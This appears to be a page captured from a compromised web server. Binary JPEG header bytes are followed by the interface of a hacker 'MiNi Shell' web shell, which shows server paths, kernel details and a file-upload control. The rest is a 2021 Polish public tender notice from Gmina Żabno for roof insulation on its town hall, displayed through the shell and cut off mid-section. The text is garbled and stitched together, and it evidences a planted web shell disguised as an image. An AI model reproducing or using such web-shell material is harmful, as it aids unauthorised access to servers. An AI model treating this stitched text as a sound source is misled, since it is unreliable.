JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210607/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210607/0007467901-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00074679 z dnia 2021-06-07</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Docieplenie stropodachu na budynku Urzędu Miejskiego w Żabnie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Żabno</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000529137</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ul. Władysława Jagiełły 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Żabno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-240</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL217 - Tarnowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dzp@zabno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zabno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Docieplenie stropodachu na budynku Urzędu Miejskiego w Żabnie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4512bc18-c7ac-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00074679</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003492/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.13 Docieplenie stropodachu na budynku Urzędu Miejskiego w Żabnie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.malopolska.pl/umwzabno/Article/get/id,26825.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/,https://epuap.gov.pl/wps/portal tgdowski@zabno.pl, pbroda@zabno.pl, dzp@zabno.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)<br/>Wpostępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami<br/>odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/,<br/>ePUAPu,dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej.2)<br/>Zamawiający przewiduje komunikację pomiędzy Zamawiającym a Wykonawca za pomocą poczty<br/>elektronicznej:a) w sprawach dotyczących przedmiotu zamówienia - Maria Janik i Łukasz Zoń, Urząd<br/>Miejski w Żabnie, ul. Jagiełły 1, 33-240 Żabno, w godz. 730 – 1300, tel. +48/14 645 60 12 wew. 32, email:<br/>pbroda@zabno.pl b) w sprawach proceduralnych – Tomasz Gdowski Urząd Miejski w Żabnie, ul.<br/>Jagiełły 1, 33-240 Żabno, w godz. 730 – 1300, tel. +48/14 645 60 12, wew. 31, e-mail:<br/>tgdowski@zabno.pl3) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia<br/>publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do<br/>następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do<br/>„Formularza do komunikacji”.4) Wymagania techniczne i organizacyjne wysyłania i odbierania<br/>dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz<br/>Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).5)<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz<br/>złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.6) Za<br/>datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP.7) Zamawiający przekazuje link do postępowania oraz ID postępowania jako<br/>załącznik do niniejszej SWZ. Dane postępowanie można wyszukać również na Liście wszystkich<br/>postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki<br/>Postępowania.8) Ofertę,oświadczenia, o których mowa w art. 125 ust. 1 ustawy, podmiotowe środki<br/>dowodowe, ,pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej lub podpisem osobistym w ogólnie dostępnych formatach danych, w szczególności w<br/>formatach .txt, .rtf,.pdf, .doc, .docx, .odt.. 9) Wykonawcy w korespondencji kierowanej do<br/>Zamawiającego powinni posługiwać się numerem przedmiotowego postępowania (znakiem sprawy). W zakresie nie wymienionym powyżej zastosowanie mają zapisy SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia<br/>ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L<br/>119 z04.05.2016, str. 1), dalej „RODO”, Gmina Żabno informuje, że: 􀀁􀀁 administratorem Państwa<br/>danych osobowych jest Burmistrz Żabna, ul. Władysława Jagiełły 1, 33-240 Żabno;􀀁􀀁 Państwa dane<br/>osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>postępowaniem o udzielenie zamówienia publicznego pn. „Montaż kolektorów słonecznych w ramach<br/>projektu Ekopartnerzy na rzecz słonecznej energii Małopolski wraz z dociepleniem stropodachu na<br/>budynku Urzędu Miejskiego w Żabnie – Etap I - Docieplenie stropodachu na budynku Urzędu<br/>Miejskiego w Żabnie ” prowadzonym w trybie podstawowym bez negocjacji.;􀀁􀀁 odbiorcami Państwa<br/>danych osobowych będą osoby lub podmioty, którym zostanie udostępniona dokumentacja<br/>postępowania zgodnie z art. 8 oraz art. 96 ust. 3 ustawy Pzp, a także art. 6 ustawy z 6 września 2001 r.<br/>o dostępie do informacji publicznej; 􀀁􀀁 Państwa dane osobowe będąprzechowywane będą przez<br/>okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;􀀁􀀁 obowiązek podania<br/>przez Państwa danych osobowych bezpośrednio Państwa dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem wpostępowaniu o udzielenie zamówienia<br/>publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; 􀀁􀀁 w odniesieniu<br/>do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany,<br/>stosowanie do art. 22 RODO;􀀁􀀁 posiadają Państwo:− na podstawie art. 15 RODO prawo dostępu do<br/>Państwa danych osobowych dotyczących;− na podstawieart. 16 RODO prawo do sprostowania<br/>Państwa danych osobowych **;− na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18<br/>ust. 2 RODO ***; − prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy<br/>uznacie Państwo, że przetwarzanie Państwa danych osobowych dotyczących narusza przepisy<br/>RODO;􀀁􀀁 nie przysługuje Państwu:− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do<br/>usunięcia danych osobowych;− prawo do przenoszenia danych osobowych, o którym mowa w art. 20<br/>RODO;− na podstawie art. 21 RODO prawo sprzeciwu, wobecprzetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO. Klauzula<br/>informacyjna o której mowa w art. 13 ust. 1 i 2 RODO, znajduje się w informacji nt. RODO - Załacznik nr 10 do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RG.271.14.2.21.ŁZ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Przedmiotem zamówienia jest docieplenie stropodachu wraz z wykonaniem nowego pokrycia<br/>dachowego oraz remontem istniejących kominów oraz instalacji odgromowej na budynku<br/>Urzędu Miejskiego w Żabnie, przy ul. Władysława Jagiełły 1, 33-240 Żabno, dz. nr 1330/1<br/>Żabno.<br/>2) Zamówienie stanowi część większego zadania inwestycyjnego pn. „Montaż kolektorów<br/>słonecznych w ramach projektu Ekopartnerzy na rzecz słonecznej energii Małopolski wraz z<br/>dociepleniem stropodachu na budynku Urzędu Miejskiego w Żabnie”.<br/>3) W skład przedmiotu zamówienia wchodzi realizacja następującego rodzaju robót<br/>budowlanych:<br/>a) Roboty rozbiórkowe:<br/>􀀀 Ustawienie rusztowania,<br/>􀀀 Demontaż obróbek blacharskich w ilości ok. 110, 00 m2,<br/>􀀀 Odwiezienie materiałów z rozbiórki na odległość do 10 km wraz z jego utylizacją<br/>􀀀 Rozebranie rynien w ilości ok. 65,00 m, wymiana rur spustowych (dach dwuspadowy) oraz w<br/>odcinkach ok. 1m przy rurach spustowych od strony południowej w celu połączenia nowych<br/>rynien z istniejącymi rurami spustowymi,<br/>b) Roboty montażowe:<br/>􀀀 Wymiana deskowania, oraz wymiana uszkodzonych elementów więźby dachowej w części<br/>środkowej budynku przy dachu dwuspadowym<br/>􀀀 Wymiana desek czołowych<br/>􀀀 Remont kominów w zakresie wyczyszczenia i uzupełnienia ubytków ścian kominów, wraz z<br/>nałożeniem powłoki – warstwa bitumicznego uszczelniacza, i montaż kratek stalowych ,<br/>􀀀 Wykonanie termoizolacji pianką PIR - λ0,022 o grubości 14 cm. do termoizolacji dachów<br/>płaskich z obustronną powłoką z aluminiową i paroizolacją.;<br/>􀀀 Wykonanie pokrycia dachu papy wierzchniego krycia wraz z papą podkładową o grubości 3<br/>mm w ilości ok. 600m2<br/>􀀀 Wykonanie obróbek blacharskich blachą stalową powlekaną<br/>􀀀 Wykonanie systemowych rynien 150 mm oraz rur spustowych 120 mm w stali powlekanej w<br/>kolorze grafitowym .<br/>􀀀 Wymiana instalacji odgromowej na połaci dachu z wykonaniem pomiarów<br/>c) Wentylacje:<br/>􀀀 Przewody wentylacyjne zakończone nasadami kominowymi wspomagającymi ciąg kominowy<br/>– nasady kominowe obrotowe Ø150, montowane bezpośrednio na rurze.<br/>d) W obrębie dachu należy wymienić istniejący właz.<br/>4) Wykonawca zapewni do kierowania robotami osoby z uprawnieniami<br/>w specjalnościach niezbędnych do prawidłowego wykonania powierzonego zadania.<br/>5) Szczegółowy opis Przedmiotu zamówienia określają:<br/>a) Dokumentacja Techniczna – Załącznik nr 6 do SWZ,<br/>b) STWiORB – Załącznik nr 5 do SWZ,<br/>c) Projektowane postanowienia umowy – Załącznik nr 7 do SWZ.<br/>6) Przedmiar robót (Załącznik nr 4 do swz) posiada jedynie charakter pomocniczy.<br/>7) Zamawiający oczekuje od Wykonawcy podania ceny za realizację zamówienia, jako ceny<br/>ryczałtowej, która obejmuje wykonanie wszystkich elementów zamówienia będących<br/>przedmiotem rysunku i tekstu załączników do siwz, łącznie z podatkiem VAT obowiązującym w<br/>dniu złożenia oferty.<br/>8) Zamawiający żąda przed podpisaniem umowy z wybranym Wykonawcą, przedstawienia przez<br/>niego Kosztorysu ofertowego, sporządzonego w oparciu<br/>o Dokumentację Techniczną, Przedmiar robót, Specyfikację Techniczną oraz ewentualną wizję<br/>lokalną przeprowadzoną przez Wykonawcę.<br/>9) W umowie o roboty budowlane przyjęto zasadę wynagrodzenia ryczałtowego tak więc<br/>przedmiar robót ma na celu wyłącznie umożliwienie dokonania wyceny poszczególnych elementów robót.<br/>Uwagi końcowe:<br/>– Wykonawca wykona roboty budowlane w oparciu o dokumentację techniczną, zgodnie z<br/>warunkami wykonania i odbioru robót określonymi w STWiORB,<br/>z należytą starannością, zgodnie z aktualnie obowiązującymi przepisami, normami technicznymi,<br/>standardami, zasadami sztuki budowlanej, etyką zawodową oraz warunkami projektowanych<br/>postanowień umowy,<br/>– Do wykonania robót Wykonawca użyje wyłącznie materiałów własnych, posiadających<br/>wymagane atesty i certyfikaty, które będą wymagane przy odbiorze końcowym robót. Przy<br/>doborze materiałów należy kierować się wymaganiami sprecyzowanymi w dokumentacji<br/>technicznej oraz specyfikacji technicznej wykonania i odbioru robót,<br/>– W czasie realizacji robót Wykonawca będzie usuwał i składował wszelkie urządzenia<br/>pomocnicze we własnym zakresie i na własny koszt,<br/>– Wszelkie inne koszty realizacji przedmiotu zamówienia (koszty mediów – energia elektryczna,<br/>woda, opłaty, i inne), konieczne do poniesienia w celu prawidłowego wykonania zamówienia, do<br/>momentu jego bezusterkowego, protokolarnego przyjęcia przez Zamawiającego poniesie<br/>Wykonawca.<br/>– Wykonawca zapewni do kierowania robotami osoby z uprawnieniami w specjalnościach<br/>niezbędnych do prawidłowego wykonania powierzonego zadania i będzie w okresie realizacji<br/>prowadził dziennik budowy (jeżeli takowy będzie konieczny) we współpracy z Inspektorem<br/>Nadzoru ustanowionym przez Zamawiającego.<br/>– Należy zachować szczególną ostrożność i zminimalizować uciążliwości związane z<br/>prowadzonymi pracami gdyż Wykonawca ponosił będzie pełną odpowiedzialność za szkody<br/>oraz następstwa nieszczęśliwych wypadków pracowników i osób trzecich, a powstałych w<br/>związku z prowadzonymi robotami budowlanymi w czasie od daty protokolarnego przejęcia<br/>terenu budowy przez Wykonawcę do daty końcowego odbioru robót,<br/>– Wykonawca jest odpowiedzialny za staranne zapoznanie się z dokumentami zamówienia.<br/>Zaleca się dokonanie wizji lokalnej w miejscu realizacji przedmiotu zamówienia, celem<br/>oszacowania na własną odpowiedzialność kosztów i ryzyka wykonania zamówienia oraz<br/>uzyskanie wszelkich danych jakie mogą być niezbędne do rzetelnego przygotowania oferty,<br/>– Jeżeli niniejsza SWZ lub inne dokumenty zamówienia wskazywałyby w odniesieniu do<br/>niektórych materiałów lub urządzeń znaki towarowe, patenty lub pochodzenie, Zamawiający,<br/>oferowanie materiałów lub urządzeń równoważnych o parametrach nie gorszych od opisanych w<br/>dokumentach zamówienia, które traktować należy jako minimalne. W związku z powyższym<br/>materiały lub urządzenia pochodzące od konkretnych producentów określają minimalne<br/>parametry jakościowe i cechy użytkowe, jakim muszą odpowiadać materiały lub urządzenia<br/>oferowane przez Wykonawcę, aby zostały spełnione wymagania stawiane przez<br/>Zamawiającego. Materiały lub urządzenia pochodzące od konkretnych producentów stanowią<br/>wyłącznie wzorzec jakościowy przedmiotu zamówienia. Pod pojęciem „minimalne parametry<br/>jakościowe i cechy użytkowe” Zamawiający rozumie wymagania dotyczące materiałów lub<br/>urządzeń zawarte w ogólnie dostępnych źródłach, katalogach, stronach internetowych<br/>producentów. Operowanie przykładowymi nazwami producenta ma jedynie na celu<br/>doprecyzowanie poziomu oczekiwań Zamawiającego w stosunku do określonego rozwiązania.<br/>Posługiwanie się nazwami producentów/produktów ma wyłącznie charakter przykładowy.<br/>Zamawiający, wskazując oznaczenie konkretnego producenta (dostawcy) lub konkretny produkt<br/>przy opisie przedmiotu zamówienia, dopuszcza jednocześnie produkty równoważne o<br/>parametrach jakościowych i cechach użytkowych co najmniej na poziomie parametrów<br/>wskazanego produktu, uznając tym samym każdy produkt o wskazanych lub lepszych<br/>parametrach. W takiej sytuacji Zamawiający wymaga złożenia stosownych dokumentów,<br/>uwiarygodniających te materiały lub urządzenia.<br/>Zamawiający zastrzega sobie prawo wystąpienia do autora dokumentacji projektowej o opinię na<br/>temat oferowanych materiałów lub urządzeń. Opinia ta może stanowić podstawę do podjęcia<br/>przez Zamawiającego decyzji o przyjęciu materiałów lub urządzeń równoważnych albo<br/>odrzuceniu oferty z powodu braku równoważności. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45261000-4 - Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty</p> <p class="mb-0">45261200-6 - Wykonywanie pokryć dachowych i malowanie dachów</p> <p class="mb-0">45261320-3 - Kładzenie rynien</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Szczegółowy sposób oceny ofert określa SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunki udziału w postępowaniu<br/>dotyczące:1) sytuacji ekonomicznej lub finansowej:Zamawiający uzna, że wykonawca spełnia<br/>warunek w/w zakresie jeżeli: wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na sumę gwarancyjną<br/>co najmniej 200.000,00 zł (słownie: dwieście tysięcy złotych 00/100).W przypadku wspólnego<br/>ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców warunek zostanie<br/>uznany za spełniony, jeżeli co najmniej 1 z wykonawców lub wszyscy łącznie wykażą, że<br/>spełniają w/w opisany warunek. Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć<br/>dokumentów dotyczących sytuacji finansowej lub ekonomicznej o których mowa powyżej, może<br/>złożyć inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez<br/>zamawiającego warunku udziału w postępowaniu.Podmiot, który zobowiązał się do<br/>udostępnienia zasobów, odpowiada solidarnie z wykonawcą, który polega na jego sytuacji<br/>finansowej lub ekonomicznej, za szkodę poniesioną przez zamawiającego powstałą wskutek<br/>nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi<br/>winy.2) zdolności technicznej 